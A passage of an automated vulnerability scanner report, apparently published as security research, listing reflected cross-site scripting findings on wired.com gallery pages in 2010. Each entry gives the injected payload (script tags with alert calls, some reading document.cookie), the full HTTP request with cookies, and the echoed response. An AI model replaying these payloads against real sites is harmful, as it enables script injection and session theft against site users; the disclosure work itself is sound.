Date: Sun, 21 Nov 2010 23:07:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia851a2"><a>7554777a3ab"> ...[SNIP]...
1.54. http://www.wired.com/culture/art/multimedia/2008/05/gallery_faves_transportation_photos [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5504f"><script>alert(1)</script>a63a753d0ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/05/gallery_faves_transportation_photos?5504f"><script>alert(1)</script>a63a753d0ce=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aacf1"><a>9216975e40b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cultureaacf1"><a>9216975e40b/art/multimedia/2008/07/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29284
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 22:09:17 GMT
Date: Sun, 21 Nov 2010 21:59:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_cultureaacf1"><a>9216975e40b ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49165"><a>72a7f1e5436 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art49165"><a>72a7f1e5436/multimedia/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:35 GMT Date: Sun, 21 Nov 2010 21:59:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art49165"><a>72a7f1e5436 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bf9a"><a>2dcaf6e058c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia6bf9a"><a>2dcaf6e058c/2008/07/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29284 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 22:09:48 GMT Date: Sun, 21 Nov 2010 21:59:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia6bf9a"><a>2dcaf6e058c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62137"><a>c291d377b9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture62137"><a>c291d377b9f/art/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:55 GMT Date: Sun, 21 Nov 2010 23:06:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture62137"><a>c291d377b9f ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9075"><a>792f200a800 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/artb9075"><a>792f200a800/multimedia/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:18 GMT Date: Sun, 21 Nov 2010 23:07:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_artb9075"><a>792f200a800 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c218"><a>6790c22ef86 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia4c218"><a>6790c22ef86/2008/07/TKTKTK HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29290 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:33 GMT Date: Sun, 21 Nov 2010 23:07:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia4c218"><a>6790c22ef86"> ...[SNIP]...
The value of the <img%20src request parameter is copied into the HTML document as plain text between tags. The payload 14661<script>alert(1)</script>f716d04df3f was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the <img%20src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ca4a"><script>alert(1)</script>649eec63546 was submitted in the <img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74d3d"><a>9b77dfd8a23 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture74d3d"><a>9b77dfd8a23/art/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture74d3d"><a>9b77dfd8a23 ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cc69"><a>3cda8068985 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art8cc69"><a>3cda8068985/multimedia/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:08:49 GMT Date: Sun, 21 Nov 2010 19:58:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art8cc69"><a>3cda8068985 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85426"><a>aac868d772e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/art/multimedia85426"><a>aac868d772e/2008/07/gallery_faves_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29302 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 20:09:36 GMT Date: Sun, 21 Nov 2010 19:59:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_art c_multimedia85426"><a>aac868d772e"> ...[SNIP]...
The value of the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload 966a2<script>alert(1)</script>976c2c8bf57 was submitted in the f56a1"><script>alert(1)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> request parameter is copied into the HTML document as plain text between tags. The payload 21969<script>alert(1)</script>01760d30d83 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT</h1> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the name of an HTML tag. The payload 6981a><script>alert(1)</script>03dc29fdb27 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src request parameter is copied into the HTML document as plain text between tags. The payload d1198<script>alert(1)</script>39b53ac696 was submitted in the f56a1"><script>alert(document.cookie)</script><h1>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT<img%20src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the HTML document as plain text between tags. The payload ea80a<script>alert(1)</script>2ef91889cf7 was submitted in the f56a1"><script>alert(document.cookie)</script>HOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbadd"><script>alert(1)</script>08561a98595 was submitted in the f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:34:07 GMT Date: Sun, 21 Nov 2010 20:24:07 GMT Connection: close Content-Length: 40729
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1cbadd"><script>alert(1)</script>08561a98595', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88eac"><script>alert(1)</script>7170e64b2e2 was submitted in the f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2 HTTP/1.1 Host: www.wired.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; __utmb=238032518; __utmc=238032518; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_nr=1290369692237; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:35:32 GMT Date: Sun, 21 Nov 2010 20:25:32 GMT Connection: close Content-Length: 40743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... cript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=188eac"><script>alert(1)</script>7170e64b2e2', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
1.73. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56a1"><script>alert(1)</script>4b74896c38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: private, max-age=600 Expires: Sun, 21 Nov 2010 20:08:35 GMT Date: Sun, 21 Nov 2010 19:58:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40625
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29303 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:56 GMT Date: Sun, 21 Nov 2010 23:06:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
